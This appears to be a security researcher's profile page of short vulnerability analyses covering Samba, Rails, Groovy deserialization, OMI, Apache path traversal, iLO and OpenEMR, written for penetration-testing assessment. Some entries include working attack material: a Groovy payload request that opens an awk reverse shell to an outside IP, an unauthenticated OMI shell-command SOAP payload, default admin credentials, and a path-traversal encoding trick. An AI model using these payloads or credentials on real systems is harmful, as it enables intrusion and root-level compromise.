noraj (62)
Last Login: February 28, 2023
noraj's Latest (20) Contributions
Technical Analysis
It has been proven working well on production domains (cf. https://twitter.com/an0n_r0/status/1589405818885398528). kpasswd support is being implemented in impacket and the vuln will be exploitable with ticketer.
Note : this vulnerability concerns Samba AD and not MS AD.
Technical Analysis
This vulnerability is old now and targets old version of Rails. But if you face such an app it’s really easy to get RCE using an existing PoC. However, editing the YAML manually can be difficult because it’s very space sensitive.
Technical Analysis
It’s easy to get RCE with a Groovy payload. Your code will be executed even if you receive an HTTP 500 error.
Example of request / payload:
POST /createItem?name=example HTTP/1.1 Host: example.org Content-Length: 689 Content-Type: application/xml; Accept: text/javascript, text/html, application/xml, text/xml, */* Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close <map> <entry> <groovy.util.Expando> <expandoProperties> <entry> <string>hashCode</string> <org.codehaus.groovy.runtime.MethodClosure> <delegate class="groovy.util.Expando"/> <owner class="java.lang.ProcessBuilder"> <command> <string>awk</string> <string>'BEGIN {s = "/inet/tcp/0/192.168.1.14/9999"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}'</string> <string>/dev/null</string> </command> </owner> <method>start</method> </org.codehaus.groovy.runtime.MethodClosure> </entry> </expandoProperties> </groovy.util.Expando> <int>1</int> </entry> </map>
Technical Analysis
The only file you can rely on for detection is /WEB-INF/web.xml
, but to read something else you’ll have to know the directory structure which is unlikely when you audit a client infrastructure. To achieve RCE you’ll be required to get file upload which is also less likely. In many cases in real life it may end not useful outside proving the vulnerability exists.
There are still some chances you can read /RELEASE-NOTES.txt
if you don’t have another mean to know the version used.
If the application is deployed under an unguessable path it’s likely you won’t be able to go further but if you can reach to the app and browse it’ll may be able to understand paths and try to read the source code of the application.
Technical Analysis
IBM Integrated Management Module (IMM) have some default admin credentials (USERID
/ PASSW0RD
). The default credentials are working on the WebUI as well as on telnet and SSH that are accessible by default. The vulnerability allows to inject system commands. However the big tradeoff is that the exploit is not public.
Technical Analysis
It gives GLPI version, the list of all plugins and their version, and some system info like the database used and its version, sometimes the webserver engine, the PHP version and the list of all PHP modules loaded, the OS distro and version + the kernel name and version.
Technical Analysis
iTop is a common ITIL software, it gives access to tons of information on the IT department, IP ranges, machine information, support tickets, username, it’s often plugged to AD LDAP, etc. Having RCE on the server allows to read configuration files containing LDAP service account credentials, retrieve local users password hashes for password spraying, obtain web admin credentials to access the information gold mine, etc.
Any low privilege account will work for the exploit, in general every employee have an account.
Technical Analysis
It is exposing PII (Personally Identifiable Information) from registered events in the calendar but also usernames and password hashes for offline crack.
Technical Analysis
The OMI server receives configuration management messages via the /wsman endpoint. Typically, an Authentication header is passed along with the message and the OMI server will ensure the client is authorized communicate. In this case the vulnerability is that when there is no Authentication header the server incorrectly accepts the message and executes the instruction under the root user.
By posting an “ExecuteShellCommand” SOAP payload to the server with no Authentication header specified, it will execute the command as root.
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" ... <s:Body> <p:ExecuteShellCommand_INPUT xmlns:p="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem"> <p:command>id</p:command> <p:timeout>0</p:timeout> </p:ExecuteShellCommand_INPUT> </s:Body> </s:Envelope>
Technical Analysis
Qualys says:
CVE-2021-42013 was introduced as the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient as it did not cover double URL encoding, therefore the vulnerable configurations remained the same, but payload used in 2.4.49 was double URL encoded in 2.4.50 to administer the same path traversal and remote code execution attack.
The attack in 2.4.49 initially encoded the second dot (.) to %2e and the same was double URL encoded into %%32%65 for version 2.4.50
Technical Analysis
The prerequisites are important:
- need
encryptionKey
fromtypo3conf/LocalConfiguration.php
exposed
- need to have and identify a valid deserialization gadget chain (eg. with phpggc)
- need to identify the target PHP version (5.6, 7.2, 7.4, 8.1, etc ?) to be able to serialize the gadget chain and it to be executed correctly; is not leaked it may required to try all major versions manually
so weaponizing is difficult and requires luck and lot of technical informations
Technical Analysis
IP restriction bypass via X-REAL-IP HTTP header then SSRF and RCE on admin route with LUA code executed via scripts
Technical Analysis
I found many many servers, during penetration testing, on corporate environment that have an integrated HPE iLO 4.
It seems the default version of the firmware shipped with the server is 2.50 which make it vulnerable by default because it’s rarely patched.
Then it’s a mater of seconds to get an administrator account on the iLO.
Technical Analysis
Patch : update to OTRS 6.0.2 to fix this specific issue but updating to 6.0.32 is recommended.
Technical Analysis
All exploits linked except the gist one have artifacts (3D
and \n
) making it unusable so use the gist cleaned version.
To patch update to v2.8+.
Technical Analysis
- Title: OpenEMR < 5.0.1.4 – (Authenticated) File upload – Remote command execution
- Vulnerable version: < 5.0.1.4 (it means up to 5.0.1.3)
- Patch: https://github.com/openemr/openemr/pull/1757/commits/c2808a0493243f618bbbb3459af23c7da3dc5485
- Docker PoC: https://github.com/sec-it/exploit-CVE-2018-15139/blob/master/docker-compose.yml
Technical Analysis
- Title: OpenEMR < 5.0.2 – (Authenticated) Path Traversal – Local File Disclosure
- Vulnerable version: < 5.0.2 (it means up to 5.0.1.7)
- Patch: https://github.com/openemr/openemr/pull/2592/files
- Docker PoC: https://github.com/sec-it/exploit-CVE-2019-14530/blob/master/docker-compose.yml
Technical Analysis
This plugin is not that commonly deployed on Wordpress installations and to detected it you need the aggressive
plugin mode of Wpscan enabled else wpDiscuz won’t be even detected.
Technical Analysis
The file upload is totally unrestricted but an account is required.